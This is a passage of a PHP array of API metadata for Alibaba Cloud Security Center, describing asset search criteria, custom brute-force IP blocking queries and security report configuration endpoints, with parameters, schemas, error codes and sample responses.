'."\n" .' - **importance**: Asset importance. '."\n" .' - **exposedStatus**: Whether it is an exposed server. '."\n" .' - **clusterId**: Cluster ID. '."\n" .' - **authVersion**: Authorization version. '."\n" .' - **flag**: Cloud provider. '."\n" .' - **ipList**: IP list. '."\n" .' - **uuidList**: UUID. '."\n" .' - **aiStatus**: Whether there is an AI component. '."\n" .' - **tagKeyValue**: ECS tag. '."\n" .' - **ecsType**: Server type. '."\n" .' - **alisecguardStatus**: Self-protection status. '."\n" .' - **alihipsStatus**: AliHips status. '."\n" .' - **alinetStatus**: AliNet status. '."\n" .' - **alidetectStatus**: Endpoint engine status. '."\n" .' - **yundunMonitorStatus**: Information collection component status. '."\n" .' - **clusterNodeStatus**: Whether it is a cluster node.', 'type' => 'string', 'example' => 'internetIp', 'title' => ''], 'Values' => ['description' => 'The attribute values of the assets that match the keyword.'."\n" .'> - When **Name** is **machineType**, the enum values are: '."\n" .'>>- **38**: Elastic Container Instance. '."\n" .'>>- **51**: RunD Container Instance. '."\n" .'>>- **52**: RunC Container Instance. '."\n" .'>- When **Name** is **osType**, the enum values are: '."\n" .'>>- **linux**: Linux. '."\n" .'>>- **windows**: Windows. '."\n" .'>- When **Name** is **hcStatus**, the enum values are: '."\n" .'>>- **NO**: No. '."\n" .'>>- **YES**: Yes. '."\n" .'>- When **Name** is **vulStatus**, the enum values are: '."\n" .'>>- **NO**: No. '."\n" .'>>- **YES**: Yes. '."\n" .'>- When **Name** is **asapVulStatus**, the enum values are: '."\n" .'>>- **NO**: No.'."\n" .'>>- **YES**: Yes. '."\n" .'>- When **Name** is **alarmStatus**, the enum values are: '."\n" .'>>- **NO**: No. '."\n" .'>>- **YES**: Yes. '."\n" .'>- When **Name** is **riskStatus**, the enum values are: '."\n" .'>>- **NO**: No. '."\n" .'>>- **YES**: Yes. '."\n" .'>>- **UNKNOWN**: Unknown. '."\n" .'>- When **Name** is **clientStatus**, the enum values are: '."\n" .'>>- **online**: Online. '."\n" .'>>- **offline**: Offline. '."\n" .'>>- **pause**: Protection Suspended. '."\n" .'>- When **Name** is **clientSubStatus**, the enum values are: '."\n" .'>>- **online**: Online. '."\n" .'>>- **offline**: Offline. '."\n" .'>>- **pause**: Protection Suspended. '."\n" .'>>- **stopped**: Server Shutdown. '."\n" .'>>- **uninstalled**: Not Installed. '."\n" .'>- When **Name** is **runningStatus**, the enum values are: '."\n" .'>>- **Running**: On. '."\n" .'>>- **notRunning**: Off. '."\n" .'>>- **UNKNOWN**: Unknown. '."\n" .'>- When **Name** is **importance**, the enum values are: '."\n" .'>>- **important**: Important. '."\n" .'>>- **general**: Normal. '."\n" .'>>- **test**: Test. '."\n" .'>- When **Name** is **containerStatus**, the enum values are: '."\n" .'>>- **NO**: No. '."\n" .'>>- **YES**: Yes. '."\n" .'>- When **Name** is **exposedStatus**, the enum values are: '."\n" .'>>- **NO**: No. '."\n" .'>>- **YES**: Yes. '."\n" .'>- When **Name** is **authVersion**, the enum values are: '."\n" .'>>- **1**: Basic. '."\n" .'>>- **3**: Enterprise. '."\n" .'>>- **5**: Advanced.'."\n" .'>>- **6**: Anti-virus. '."\n" .'>>- **7**: Ultimate. '."\n" .'>- When **Name** is **flag**, the enum values are: '."\n" .'>>- **0|8|15**: Alibaba Cloud. '."\n" .'>>- **1**: External Host. '."\n" .'>>- **2**: IDC. '."\n" .'>>- **3**: Tencent Cloud. '."\n" .'>>- **4**: Huawei Cloud. '."\n" .'>>- **5**: Azure. '."\n" .'>>- **7**: AWS. '."\n" .'>>- **9**: SAE. '."\n" .'>>- **10**: PAI. '."\n" .'>>- **13**: ACS. '."\n" .'>>- **14**: Volcano Cloud. '."\n" .'>>- **16**: Google Cloud. '."\n" .'>- When **Name** is **aiStatus**, the enum values are: '."\n" .'>>- **NO**: No. '."\n" .'>>- **YES**: Yes. '."\n" .'>- When **Name** is **ecsType**, the enum values are: '."\n" .'>>- **8**: Simple Application Server. '."\n" .'>>- **11**: LINGJUN GPU-accelerated Bare Metal Instance. '."\n" .'>>- **15**: RDS Custom. '."\n" .'>>- **!8**: Host. '."\n" .'>- When **Name** is **alisecguardStatus**, the enum values are: '."\n" .'>>- **0**: Plug-in Online. '."\n" .'>>- **1**: Plug-in Disabled. '."\n" .'>>- **2**: Plug-in Offline. '."\n" .'>>- **-99**: The installation failed. '."\n" .'>- When **Name** is **alihipsStatus**, the enum values are: '."\n" .'>>- **0**: Plug-in Online. '."\n" .'>>- **1**: Plug-in Disabled. '."\n" .'>>- **2**: Plug-in Offline. '."\n" .'>>- **-99**: The installation failed. '."\n" .'>- When **Name** is **alinetStatus**, the enum values are: '."\n" .'>>- **0**: Plug-in Online. '."\n" .'>>- **1**: Plug-in Disabled. '."\n" .'>>- **2**: Plug-in Offline. '."\n" .'>>- **-99**: The installation failed. '."\n" .'>- When **Name** is **alidetectStatus**, the enum values are: '."\n" .'>>- **0**: Plug-in Online. '."\n" .'>>- **1**: Plug-in Disabled. '."\n" .'>>- **2**: Plug-in Offline. '."\n" .'>>- **-99**: The installation failed. '."\n" .'>- When **Name** is **yundunMonitorStatus**, the enum values are: '."\n" .'>>- **0**: Plug-in Online. '."\n" .'>>- **1**: Plug-in Disabled. '."\n" .'>>- **2**: Plug-in Offline. '."\n" .'>>- **-99**: The installation failed. '."\n" .'>- When **Name** is **clusterNodeStatus**, the enum values are: '."\n" .'>>- **false**: No. '."\n" .'>>- **true**: Yes.', 'type' => 'string', 'example' => '47.96.XX.XX', 'title' => ''], 'MultiValues' => ['description' => 'The structured attribute values of the assets that match the keyword. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **vendor**: providers.'."\n" .'* **regionIds**: IDs of supported regions'."\n", 'type' => 'string', 'example' => '[{"vendor":0,"regionIds":{"default":["ap-southeast-1","ap-northeast-2","ap-southeast-3","ap-southeast-5","ap-southeast-7","me-central-1"]}},{"vendor":1,"regionIds":{"default":["outside-of-aliyun"]}}]', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeCriteria', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8E6DDACF-99AF-5939-AFFD-FCCD3B01E724\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"input\\",\\n \\"Name\\": \\"internetIp\\",\\n \\"Values\\": \\"47.96.XX.XX\\",\\n \\"MultiValues\\": \\"[{\\\\\\"vendor\\\\\\":0,\\\\\\"regionIds\\\\\\":{\\\\\\"default\\\\\\":[\\\\\\"ap-southeast-1\\\\\\",\\\\\\"ap-northeast-2\\\\\\",\\\\\\"ap-southeast-3\\\\\\",\\\\\\"ap-southeast-5\\\\\\",\\\\\\"ap-southeast-7\\\\\\",\\\\\\"me-central-1\\\\\\"]}},{\\\\\\"vendor\\\\\\":1,\\\\\\"regionIds\\\\\\":{\\\\\\"default\\\\\\":[\\\\\\"outside-of-aliyun\\\\\\"]}}]\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCustomBlockInstances' => [ 'summary' => 'Queries the list of servers on which the custom defense rule against brute-force attacks takes effect.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '8', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the rule is enabled for the server.'."\n" ."\n" .'* **2**: enabling failed'."\n" .'* **1**: enabled'."\n" .'* **0**: disabled'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that you want to specify in the rule.'."\n" ."\n" .'> You can call the [DescribeCustomBlockRecords](~~DescribeCustomBlockRecords~~) operation to obtain the IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '47.92.33.1xx', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The traffic direction that you want to specify in the custom rule. Valid values:'."\n" ."\n" .'* **in**: inbound'."\n" .'* **out**: outbound'."\n", 'type' => 'string', 'required' => false, 'example' => 'in', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D81DD78E-E006-5C65-A171-C8CB09XXXXX', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of servers to which the defense rule is applied.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '83', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'InstanceList' => [ 'description' => 'The server ID.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'Indicates whether the rule is enabled for the server.'."\n" ."\n" .'* **2**: enabling failed'."\n" .'* **1**: enabled'."\n" .'* **0**: disabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => 'f2d6e901-1004-4ca8-9dae-53ec04a9****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '116.62.121.1xx', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.1.xx', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset.'."\n", 'type' => 'string', 'example' => 'myInstance', 'title' => ''], 'BlockType' => ['description' => 'The blocking type. Valid values:'."\n" ."\n" .'* **group**: security group'."\n" .'* **alinet**: host network extension'."\n", 'type' => 'string', 'example' => 'group', 'title' => ''], 'ErrorCode' => ['description' => 'The error code returned.'."\n", 'type' => 'string', 'example' => 'AliNetNotOnline', 'title' => ''], 'SuccessInfo' => ['description' => 'The information that is returned after brute-force attacks are blocked.'."\n", 'type' => 'string', 'example' => '{"aliUid":*******,"groupId":"sg-xxxx","groupName":"Sas_Malicious_Ip_Security_Group","groupType":"normal","instanceId":"i-xxxx","regionId":"cn-shenzhen","vpcId":"vpc-xxxxxxxx"}', 'title' => ''], 'AliNetOnline' => ['description' => 'The status of the host network extension. Valid values:'."\n" ."\n" .'* **true**: online'."\n" .'* **false**: offline'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D81DD78E-E006-5C65-A171-C8CB09XXXXX\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 83,\\n \\"Count\\": 10\\n },\\n \\"InstanceList\\": [\\n {\\n \\"Status\\": 1,\\n \\"Uuid\\": \\"f2d6e901-1004-4ca8-9dae-53ec04a9****\\",\\n \\"InternetIp\\": \\"116.62.121.1xx\\",\\n \\"IntranetIp\\": \\"192.168.1.xx\\",\\n \\"InstanceName\\": \\"myInstance\\",\\n \\"BlockType\\": \\"group\\",\\n \\"ErrorCode\\": \\"AliNetNotOnline\\",\\n \\"SuccessInfo\\": \\"{\\\\\\"aliUid\\\\\\":*******,\\\\\\"groupId\\\\\\":\\\\\\"sg-xxxx\\\\\\",\\\\\\"groupName\\\\\\":\\\\\\"Sas_Malicious_Ip_Security_Group\\\\\\",\\\\\\"groupType\\\\\\":\\\\\\"normal\\\\\\",\\\\\\"instanceId\\\\\\":\\\\\\"i-xxxx\\\\\\",\\\\\\"regionId\\\\\\":\\\\\\"cn-shenzhen\\\\\\",\\\\\\"vpcId\\\\\\":\\\\\\"vpc-xxxxxxxx\\\\\\"}\\",\\n \\"AliNetOnline\\": true\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeCustomBlockInstances', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomBlockInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCustomBlockInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeCustomBlockRecords' => [ 'summary' => 'Queries brute-force attacks interception records for custom blocked IP addresses defined on one or more servers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92045', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the brute-force attacks defense rule. Valid values:'."\n" .'- **0**: Invalid.'."\n" .'- **1**: Enabled.'."\n" .'- **2**: Failed.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address to be blocked for brute-force attacks prevention.', 'type' => 'string', 'required' => false, 'example' => '117.66.XX.XX', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Settings for paged query. The number of records to return on each page during paging. Default value: **20**, which indicates that 20 records are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response struct.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6B7T8Y', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query during paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned per page in a paged query during paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '708', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RecordList' => [ 'description' => 'The list of policy records.', 'type' => 'array', 'items' => [ 'description' => 'The policy record object.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the brute-force attacks defense rule. Valid values:'."\n" .'- **0**: Invalid.'."\n" .'- **1**: Enabled.'."\n" .'- **2**: Failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BlockExpireDate' => ['description' => 'The UNIX timestamp when the brute-force attacks IP blocking expires.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671506882063', 'title' => ''], 'EnableCount' => ['description' => 'The number of servers on which the blocking rule has taken effect.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'ServerCount' => ['description' => 'The total number of servers on which the blocked IP record needs to take effect.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'BlockIp' => ['description' => 'The IP address blocked for brute-force attacks prevention.', 'type' => 'string', 'example' => '45.227.XX.XX'."\n", 'title' => ''], 'Bound' => ['description' => 'The direction in which the server brute-force attacks interception policy blocks the IP address. Valid values:'."\n" .'- **in**: inbound'."\n" .'- **out**: outbound.', 'type' => 'string', 'example' => 'in', 'title' => ''], 'Source' => ['description' => 'The source from which the rule was delivered.', 'type' => 'string', 'example' => 'UserRule', 'title' => ''], 'Id' => ['description' => 'The record ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '353376', 'title' => ''], 'TargetList' => [ 'description' => 'The servers on which the rule takes effect.', 'type' => 'array', 'items' => [ 'description' => 'The policy record object.', 'type' => 'object', 'properties' => [ 'Target' => ['description' => 'The ID of the specified target asset.', 'type' => 'string', 'example' => '032b618f-b220-4a0d-bd37-fbdc6*******', 'title' => ''], 'TargetType' => ['description' => 'The query type. Valid values:'."\n" .'- **uuid**: asset ID.', 'type' => 'string', 'example' => 'uuid', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query custom interception policies', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomBlockRecords'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCustomBlockRecords', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6B7T8Y\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 708,\\n \\"Count\\": 3\\n },\\n \\"RecordList\\": [\\n {\\n \\"Status\\": 1,\\n \\"BlockExpireDate\\": 1671506882063,\\n \\"EnableCount\\": 4,\\n \\"ServerCount\\": 6,\\n \\"BlockIp\\": \\"45.227.XX.XX\\\\n\\",\\n \\"Bound\\": \\"in\\",\\n \\"Source\\": \\"UserRule\\",\\n \\"Id\\": 353376,\\n \\"TargetList\\": [\\n {\\n \\"Target\\": \\"032b618f-b220-4a0d-bd37-fbdc6*******\\",\\n \\"TargetType\\": \\"uuid\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCustomizeReportConfigDetail' => [ 'summary' => 'Retrieves the details of a report delivery configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '202.104.XXX.XXX', 'title' => ''], ], [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The report ID.\\'."\n" .'The ReportId returned by calling the [DescribeCustomizeReportList](~~271655~~) operation.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '619031', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'ReportStatus' => ['description' => 'The report status. Valid values:'."\n" .' - **0**: Disabled.'."\n" .' - **1**: Enabled.', 'type' => 'string', 'example' => '1', 'title' => ''], 'ReportLang' => ['description' => 'The language type. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'example' => 'zh', 'title' => ''], 'ChartIds' => ['description' => 'The report chart configuration IDs, separated by commas.', 'type' => 'string', 'example' => 'BIZ_STAT_QUERY_KEY_ATTACK,CUSTOM_VUL_CVE_LIST,CUSTOM_VUL_SYS_LIST,CUSTOM_VUL_WEBCMS_LIST,CUSTOM_AUTO_BREAKING_PIE,CUSTOM_AK_LEAK_LIST,KEY_HP_TAMPERPROOF,KEY_HP_DEFENCE', 'title' => ''], 'IsDefault' => ['description' => 'Indicates whether the report is a default report. Valid values:'."\n" .'- **0**: Not a default report.'."\n" .'- **1**: A default report.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SendTime' => ['description' => 'The delivery time, in the format of HH:mm:ss.', 'type' => 'string', 'example' => '09:00:00', 'title' => ''], 'ReportId' => ['description' => 'The report ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '663434', 'title' => ''], 'ReportType' => ['description' => 'The report type. Valid values:'."\n" ."\n" .'- **0**: Daily report.'."\n" .'- **1**: Weekly report.'."\n" .'- **2**: Monthly report.'."\n" .'- **3**: Custom period.', 'type' => 'string', 'example' => '3', 'title' => ''], 'Recipients' => ['description' => 'The recipient email addresses, separated by commas.', 'type' => 'string', 'example' => 'PengZheng@eaton.com,ZhongJi@Eaton.com', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '379a9b8f-107b-4630-9e95-2299a1ea****', 'title' => ''], 'ReportSendType' => ['description' => 'The report delivery time range. Valid values:'."\n" .'- **1**: 0:00 to 6:00.'."\n" .'- **2**: 6:00 to 12:00.'."\n" .'- **3**: 12:00 to 18:00.'."\n" .'- **4**: 18:00 to 24:00.', 'type' => 'string', 'example' => '2', 'title' => ''], 'ReportEndDate' => ['description' => 'The end date for report delivery.', 'type' => 'string', 'example' => '1720022399999', 'title' => ''], 'ReportStartDate' => ['description' => 'The start date for report delivery.', 'type' => 'string', 'example' => '1717430400000', 'title' => ''], 'Title' => ['description' => 'The title.', 'type' => 'string', 'example' => 'marketing report', 'title' => ''], 'SendStartTime' => ['description' => 'The delivery start time, in the format of HH:mm:ss.', 'type' => 'string', 'example' => '09:00:00', 'title' => ''], 'SendEndTime' => ['description' => 'The delivery end time, in the format of HH:mm:ss.', 'type' => 'string', 'example' => '10:00:00', 'title' => ''], 'PinnedTime' => ['description' => 'The pinned time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1717430400000', 'title' => ''], 'ReportDays' => ['description' => 'The number of recent days covered by the report statistics.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'SendPeriodType' => ['description' => 'The delivery period type. Valid values:'."\n" .'- **DAY**: day.'."\n" .'- **WEEK**: week.'."\n" .'- **MONTH**: month.', 'type' => 'string', 'example' => 'MONTH', 'title' => ''], 'SendPeriodDays' => ['description' => 'The specific execution dates within the delivery period.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'TargetUids' => ['description' => 'The list of target UIDs, separated by commas.', 'type' => 'string', 'example' => '1457515594445744,1600011353839072,1766185894104675,1674080148055995,1627510829033157', 'title' => ''], 'GroupType' => ['description' => 'The group type. Valid values:'."\n" .'- **ALIYUN_RG**: ALIYUN_RG.'."\n" .'- **SAS_GROUP**: SAS_GROUP.', 'type' => 'string', 'example' => 'SAS_GROUP', 'title' => ''], 'TargetGroups' => ['description' => 'The targets within the group.', 'type' => 'string', 'example' => '12125884,12140191', 'title' => ''], 'MemberAccountSyncFlag' => ['description' => 'Specifies whether newly added accounts are included by default. Valid values:'."\n" ."\n" .'- **true**: Included.'."\n" .'- **false**: Not included.'."\n" .'> Only version 2.0.0 supports this parameter.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve report delivery configuration details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizeReportConfigDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:DescribeCustomizeReportConfigDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ReportStatus\\": \\"1\\",\\n \\"ReportLang\\": \\"zh\\",\\n \\"ChartIds\\": \\"BIZ_STAT_QUERY_KEY_ATTACK,CUSTOM_VUL_CVE_LIST,CUSTOM_VUL_SYS_LIST,CUSTOM_VUL_WEBCMS_LIST,CUSTOM_AUTO_BREAKING_PIE,CUSTOM_AK_LEAK_LIST,KEY_HP_TAMPERPROOF,KEY_HP_DEFENCE\\",\\n \\"IsDefault\\": 1,\\n \\"SendTime\\": \\"09:00:00\\",\\n \\"ReportId\\": 663434,\\n \\"ReportType\\": \\"3\\",\\n \\"Recipients\\": \\"PengZheng@eaton.com,ZhongJi@Eaton.com\\",\\n \\"RequestId\\": \\"379a9b8f-107b-4630-9e95-2299a1ea****\\",\\n \\"ReportSendType\\": \\"2\\",\\n \\"ReportEndDate\\": \\"1720022399999\\",\\n \\"ReportStartDate\\": \\"1717430400000\\",\\n \\"Title\\": \\"marketing report\\",\\n \\"SendStartTime\\": \\"09:00:00\\",\\n \\"SendEndTime\\": \\"10:00:00\\",\\n \\"PinnedTime\\": 1717430400000,\\n \\"ReportDays\\": 30,\\n \\"SendPeriodType\\": \\"MONTH\\",\\n \\"SendPeriodDays\\": 12,\\n \\"TargetUids\\": \\"1457515594445744,1600011353839072,1766185894104675,1674080148055995,1627510829033157\\",\\n \\"GroupType\\": \\"SAS_GROUP\\",\\n \\"TargetGroups\\": \\"12125884,12140191\\",\\n \\"MemberAccountSyncFlag\\": true\\n}","type":"json"}]', ], 'DescribeCustomizeReportList' => [ 'summary' => 'Queries security reports.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92050', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ReportStatus', 'in' => 'query', 'schema' => ['description' => 'The state of the report. Valid values:'."\n" ."\n" .'* **0**: disabled'."\n" .'* **1**: enabled'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ReportType', 'in' => 'query', 'schema' => ['description' => 'The type of the report. Valid values:'."\n" ."\n" .'* **0**: daily report'."\n" .'* **1**: weekly report'."\n" .'* **2**: monthly report'."\n" .'* **3**: report whose statistics are collected in a custom time range'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'Title', 'in' => 'query', 'schema' => ['description' => 'The name of the report.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 